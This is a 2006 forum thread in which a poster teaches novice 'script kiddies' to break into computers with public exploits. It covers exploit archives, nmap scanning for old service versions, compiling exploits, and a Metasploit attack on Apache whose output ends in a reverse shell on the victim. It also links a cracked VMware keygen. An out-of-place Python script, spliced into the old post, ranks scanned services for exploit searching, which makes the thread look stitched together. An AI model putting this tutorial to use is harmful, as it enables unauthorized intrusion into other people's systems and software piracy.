Xisp.org Forums > Porn Password Cracking > Cracking Tutorials

Exploiting Tutorial for Newbs :P

Views: 9854 - Replies: 27

01-09-2006, 10:14 AM   #1
overkill
Guest

* I have Admin's permission for this *

This is for educational purposes only. Also, You should only test this on your own computers!



I. Intro
This tutorial is not for the experienced. It does not break down the process of how exploits work! This is for those who do not know what exploits are, don't know how to code, and would like some insight on this method of hacking called "exploiting". This tutorial will explain how you can easily get into computers without having any knowledge of programming or hacking whatsoever. If you are in this forum I would think that you do know some basics. This text simply explains some methods to use for the script kiddies, but everyone has to start somewhere, don't they? So, newbs, before you get discouraged and quit just remember that "You have to crawl before you can walk, and you have to walk before you can run"...


II. What are exploits?

1. Exploits are applications or scripts made by programmers. An Exploit takes advantage of a hole (vulnerability) that has been found in a program, service, or operating system. You can use an exploit to gain access to an unpatched web server’s remote command prompt instantly. Yes, it's really that easy.

2. Most exploits are made to run on Linux, and don't work on Windows. But don't worry, a lot of these are also ported to Windows. If you would like to use Linux to get access to these and other goodies you can use VMware. Crack found here:
http://rapidshare.de/files/9288607/ishtarkg.zip.html

3. You run the exploit from the command prompt; it looks something like this (minus 3-5 lines of commands):



This is the ie_xp_pfv_metafile exploit; it exploits a hole in Windows XP, 2003, and Vista. If you don't know how to start the command prompt in Windows, please stop reading!


III. Where can I get exploits?

1. You can download uncompiled exploits at:
http://www.packetstormsecurity.nl
http://archives.neohapsis.com/.nl
http://www.milw0rm.com
http://www.frsirt.com

and more….

2. You can also download user friendly programs that have them for you.
Here are two:
Metasploit <- http://www.metasploit.com/projects/Framework/downloads.html
ExploitTree search (unix)<- http://www.securityforest.com/wiki/index.php/Category:ExploitTree


IV. Which exploit should I choose?

1. This depends on your target. The first thing you want to ask is “what services is your target running?” A few scanners that do this for you are:
Superscanner -> http://www.foundstone.com
Nmap -> http://www.insecure.org/nmap/
And there are others for win and unix machines…

2. Take a look at this example of a scan log made by nmap:



You could search exploits for the Apache httpd 1.3.31 webserver, the FTP server, SSH server, and the SMTP server. Knowing that these versions are old and not "up-to-date", we could find something. Find out what services your target is running. If you can find an old version of something, chances are there's an exploit for it. Just search the directories given to you in this tutorial and see what comes up. Your target not running any services? All ports closed? If they are, then this is where we could see if the site's members' area is spoofable or if the site has an exploitable program or script you could access by URL (both will not be explained in this tutorial). There are lots of different ways in, and you're only limited by your imagination. Oh, and by up-to-date, patched software with no known vulnerabilities. At least for script kiddies.


V. How do I compile exploits?

1. First, you should check out the programming language the exploit is made in. Look up the file extension in Google and this will usually tell you.

2. If it's written in C you should get a C compiler and just paste the code into the compiler, click a button that says "Compile" and you're done. There are tons of C compilers, some of them are free. I use Bloodshed, which can be found here: http://www.bloodshed.net
If you're using Linux and need to compile a C program, type "gcc exploit.c -o exploit", replacing "exploit.c" with the name of the C file to compile.

3. For other languages, just get a compiler for the language the exploit is coded in and do exactly the same. You should use different compilers for different languages of course.


VI. How do I use them to break into computers?

Once you have a compiled exploit for your security hole, it's time to use it! All you need to do is type the name of the exploit in the command prompt or shell, and it will tell you how to use it. Metasploit works a little differently and has an easy to read user manual. Here is a Metasploit exploit execution example (after all the options are set):

apache_chunked_win32(win32_reverse) > exploit 192.168.1.101 <- executing command in console

results:
[*] Starting Reverse Handler.
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...
[*] Got connection from 192.168.1.101:1031

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\Apache Group\Apache>

This can give you a remote command prompt. Most exploits do this! Some will let you upload stuff, some will let you send remote commands, others let you view important files, etc. The beauty with Metasploit is you can choose what you'd like to do after you exploit the vulnerability in the system (it's called a PAYLOAD). This concludes the tutorial!

Have fun with the new knowledge; but most of all:
Be Careful and try not to do something stupid :P

Last edited by overkill; 01-10-2006 at 12:22 PM..
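Added worked example for section IV of the post above (this is editor-added code, not part of overkill's tutorial or any tool it links to): a Python script that parses a constructed `nmap -sV` listing in nmap's normal output format, pulls a product and version out of each open port's banner, and flags the ones whose version sorts older than a per-product baseline. The sample scan lines (apart from the "Apache httpd 1.3.31" banner the post mentions), the target address, and every version number in the baseline table are assumptions made up for this example; they are not scan results and say nothing about which versions are actually vulnerable. The point is the workflow the post describes: take the version strings a scanner hands you, compare them to what "current" looks like, and you have your list of things to go and search the exploit archives for.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample of `nmap -sV` normal output; not a real scan. Only the
# "Apache httpd 1.3.31" line echoes the tutorial, the other banners are made up.
SAMPLE_NMAP = """\
Starting Nmap ( http://www.insecure.org/nmap/ )
Interesting ports on 192.168.1.101:
PORT     STATE    SERVICE      VERSION
21/tcp   open     ftp          ProFTPD 1.2.10
22/tcp   open     ssh          OpenSSH 3.9p1 (protocol 1.99)
25/tcp   open     smtp         Sendmail 8.13.1/8.13.1
80/tcp   open     http         Apache httpd 1.3.31 ((Unix))
139/tcp  filtered netbios-ssn
443/tcp  closed   https
"""

# Assumed baseline: the version the operator's own patch inventory treats as
# current for each product. Placeholder numbers for illustration; this table is
# not a claim about which versions are or are not vulnerable.
ASSUMED_BASELINE = {
    "ProFTPD": "1.3.0",
    "OpenSSH": "4.2",
    "Sendmail": "8.13.5",
    "Apache httpd": "1.3.34",
}

# One nmap port line: "<port>/<proto>  <state>  <service>  [<version banner>]"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<banner>.*))?$"
)


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    product: Optional[str]
    version: Optional[str]


def split_product_version(banner: str) -> Tuple[Optional[str], Optional[str]]:
    """'Apache httpd 1.3.31 ((Unix))' -> ('Apache httpd', '1.3.31').

    The product is everything before the first token that starts with a digit;
    the version is that token up to the first character outside [A-Za-z0-9_.],
    so 'Sendmail 8.13.1/8.13.1' yields '8.13.1' and 'OpenSSH 3.9p1' yields '3.9p1'.
    """
    banner = banner.strip()
    if not banner:
        return None, None
    m = re.match(r"^(?P<product>[^\d(]+?)\s+(?P<version>\d[\w.]*)", banner)
    if not m:
        return banner, None          # a product name with no version number
    return m.group("product"), m.group("version")


def version_key(version: str):
    """Comparable key for dotted versions with letter suffixes ('3.9p1').

    Numeric runs compare as integers, alphabetic runs as strings; the tag in
    each pair keeps ints and strings from ever being compared directly.
    A shorter version that is a prefix of a longer one sorts as older.
    """
    parts = re.findall(r"\d+|[A-Za-z]+", version)
    return tuple((0, int(p)) if p.isdigit() else (1, p) for p in parts)


def parse_nmap(text: str) -> List[Service]:
    """Pull every port line out of nmap normal output."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if not m:
            continue                 # banner, header and blank lines
        product, version = split_product_version(m.group("banner") or "")
        services.append(Service(int(m.group("port")), m.group("proto"),
                                m.group("state"), m.group("service"),
                                product, version))
    return services


def outdated_services(services: List[Service], baseline: dict) -> List[Tuple[Service, str]]:
    """Open services whose banner version is older than the baseline for that product.

    Closed/filtered ports and banners without a recognisable product/version
    are skipped rather than guessed at.
    """
    hits = []
    for s in services:
        if s.state != "open" or s.product is None or s.version is None:
            continue
        base = baseline.get(s.product)
        if base is not None and version_key(s.version) < version_key(base):
            hits.append((s, base))
    return hits


if __name__ == "__main__":
    for svc, base in outdated_services(parse_nmap(SAMPLE_NMAP), ASSUMED_BASELINE):
        print(f"{svc.port}/{svc.proto} {svc.name}: {svc.product} {svc.version} "
              f"is older than baseline {base}; search the exploit archives for it")
```

Run it as-is to see the four open services in the sample flagged; swap `SAMPLE_NMAP` for the saved output of a real `nmap -sV` run against a box you own and `ASSUMED_BASELINE` for your own patch list. Note that a version banner is only what the service claims: backported fixes, changed banners and services that lie about themselves all break the "old number means exploitable" shortcut, which is why the output says "search for it" rather than "exploitable".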

01-09-2006, 11:03 AM   #2
A_Tjuh
Guest

Don't forget your disclaimer that it's for educational purposes only ;)

Nice tut btw :)

01-09-2006, 11:09 AM   #3
overkill
Guest

Thanks A_Tjuh,

I added that part :]

01-09-2006, 01:29 PM   #4
maxgiver
Platinum Exploiter

Job well done overkill, nice work you put into this,

very well explained,

good work!!

Last edited by maxgiver; 01-09-2006 at 01:32 PM..


01-09-2006, 01:51 PM   #6
surfer663
Guest

overkill, thanks a lot dude, this seems an awesome tutorial. At least you're one person who has taken the time to help the newbies here, unlike others.

once again thanks a lot man

01-09-2006, 05:10 PM   #7
slysnake
Cheshire Cat

Nice tutorial!! Very clear and easy to understand. Plus I don't think it goes too far in letting all the cookies out of the bag. Well done. I especially liked this part...
Quote:
If you don't know how to start the command prompt in windows, please stop reading!

01-12-2006, 01:18 PM   #8
Permutant
Banned

One of the best texts I've read about exploits, thanks a lot!

01-17-2006, 10:23 AM   #9
fanatic32
Guest

Yeah, great tut, gives enough info to start out with.

01-17-2006, 11:17 AM   #10
xardi
Regular Member

Really nice tut:)
Good work